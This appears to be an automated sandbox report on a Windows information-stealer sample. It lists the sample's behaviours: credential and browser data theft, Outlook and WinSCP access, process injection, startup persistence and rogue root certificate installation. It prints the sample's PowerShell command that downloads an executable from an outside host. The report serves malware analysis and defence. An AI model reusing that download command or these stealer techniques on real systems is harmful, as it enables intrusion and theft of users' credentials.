Malware Analysis Report

2024-12-01 03:02

Sample ID 241107-3tey4azhnm
Target c96a43db0abf02b0db8ca6efc658dc38.exe
SHA256 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172
Tags
execution collection discovery spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172

Threat Level: Known bad

The file c96a43db0abf02b0db8ca6efc658dc38.exe was found to be: Known bad.

Malicious Activity Summary

execution collection discovery spyware stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Reads WinSCP keys stored on the system

Reads user/profile data of web browsers

Executes dropped EXE

Loads dropped DLL

Drops startup file

Checks installed software on the system

Accesses Microsoft Outlook profiles

Accesses Microsoft Outlook accounts

Drops file in System32 directory

Suspicious use of SetThreadContext

AutoIT Executable

Drops file in Program Files directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Program crash

Suspicious use of SendNotifyMessage

Modifies registry class

Suspicious behavior: EnumeratesProcesses

outlook_office_path

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Checks processor information in registry

outlook_win_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-07 23:48

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-07 23:48

Reported

2024-11-07 23:50

Platform

win7-20241010-en

Max time kernel

14s

Max time network

18s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c96a43db0abf02b0db8ca6efc658dc38.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\c96a43db0abf02b0db8ca6efc658dc38.exe

"C:\Users\Admin\AppData\Local\Temp\c96a43db0abf02b0db8ca6efc658dc38.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri "https://my.cloudme.com/v1/ws2/:slight-stood/:web_1/web" -OutFile "C:\Users\Public\Guard.exe""

Network

N/A

Files

memory/2076-4-0x000007FEF643E000-0x000007FEF643F000-memory.dmp

memory/2076-5-0x000000001B230000-0x000000001B512000-memory.dmp

memory/2076-7-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp

memory/2076-6-0x0000000001F40000-0x0000000001F48000-memory.dmp

memory/2076-8-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp

memory/2076-9-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp

memory/2076-10-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp

memory/2076-11-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp

memory/2076-12-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-07 23:48

Reported

2024-11-07 23:50

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

138s

Command Line

C:\Windows\Explorer.EXE

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1060 created 3504 N/A C:\Users\Public\Guard.exe C:\Windows\Explorer.EXE
PID 1060 created 3504 N/A C:\Users\Public\Guard.exe C:\Windows\Explorer.EXE
PID 2348 created 3504 N/A C:\Users\Public\jsc.exe C:\Windows\Explorer.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\jsc.exe N/A
N/A N/A C:\Users\Public\jsc.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\rundll32.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Windows\SysWOW64\rundll32.exe N/A

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2348 set thread context of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2256 set thread context of 4924 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 1156 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 2008 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 4312 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 5004 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 3724 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 1832 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 864 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 2040 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 5100 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 3136 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 428 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 3716 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 2984 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 1396 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe C:\Windows\SysWOW64\rundll32.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Public\jsc.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\Guard.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\jsc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\jsc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\rundll32.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\rundll32.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet C:\Windows\SysWOW64\rundll32.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information C:\Windows\SysWOW64\rundll32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\9C861E8CA7BC60FED57FD39F7A533C075EE77CA7 C:\Windows\SysWOW64\rundll32.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\9C861E8CA7BC60FED57FD39F7A533C075EE77CA7\Blob = 0300000001000000140000009c861e8ca7bc60fed57fd39f7a533c075ee77ca720000000010000005602000030820252308201bba003020102020821785cd05cc195cc300d06092a864886f70d01010b050030613120301e06035504030c174469676943656f7420476c6f62616c20526f6f7420473231193017060355040b0c107777772e64696769636572742e636f6d31153013060355040a0c0c446967694365727420496e63310b3009060355040613025553301e170d3232313130383233343835395a170d3236313130373233343835395a30613120301e06035504030c174469676943656f7420476c6f62616c20526f6f7420473231193017060355040b0c107777772e64696769636572742e636f6d31153013060355040a0c0c446967694365727420496e63310b300906035504061302555330819f300d06092a864886f70d010101050003818d0030818902818100e4cf8283e224cc8593c0a464cf43ae82c68b149226e3eee00d9c4e8bbf0c72c81c180df2787f0a4ebd01b525a7da9339c62b900b37cc2d533a744e42e26cfa155316d03d029f5f6220047d1863b6052a79f63dafacdcb62d4062007b1b191bc8dbac766e153daf45e5a6938cbd2239127e19879d14da139612b6be56d720ad9d0203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010b050003818100ca9b522e0554269deb177780a42e08f64fc893e9133310ee5ea51323fb4724dace9066ad502bbf77647821a13e7f4c4489f0b36faedc4ddd1de1de77dc766411f3da8171dd46e34b60863982ee13edc7de6c5e121cc4040a670b750ab3af19e555173bcabec65336ed2cf19432f4883274ff63e45a5d26f10ab448a996b3b738 C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\jsc.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Public\jsc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Public\jsc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3700 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\c96a43db0abf02b0db8ca6efc658dc38.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3700 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\c96a43db0abf02b0db8ca6efc658dc38.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3700 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\c96a43db0abf02b0db8ca6efc658dc38.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3700 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\c96a43db0abf02b0db8ca6efc658dc38.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3528 wrote to memory of 1060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Guard.exe
PID 3528 wrote to memory of 1060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Guard.exe
PID 3528 wrote to memory of 1060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Guard.exe
PID 1060 wrote to memory of 4716 N/A C:\Users\Public\Guard.exe C:\Windows\SysWOW64\cmd.exe
PID 1060 wrote to memory of 4716 N/A C:\Users\Public\Guard.exe C:\Windows\SysWOW64\cmd.exe
PID 1060 wrote to memory of 4716 N/A C:\Users\Public\Guard.exe C:\Windows\SysWOW64\cmd.exe
PID 1060 wrote to memory of 2348 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 1060 wrote to memory of 2348 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 1060 wrote to memory of 2348 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 1060 wrote to memory of 2348 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 1060 wrote to memory of 2348 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 4512 wrote to memory of 4324 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\cmd.exe
PID 4512 wrote to memory of 4324 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\cmd.exe
PID 4512 wrote to memory of 4324 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\cmd.exe
PID 4324 wrote to memory of 4004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4324 wrote to memory of 4004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
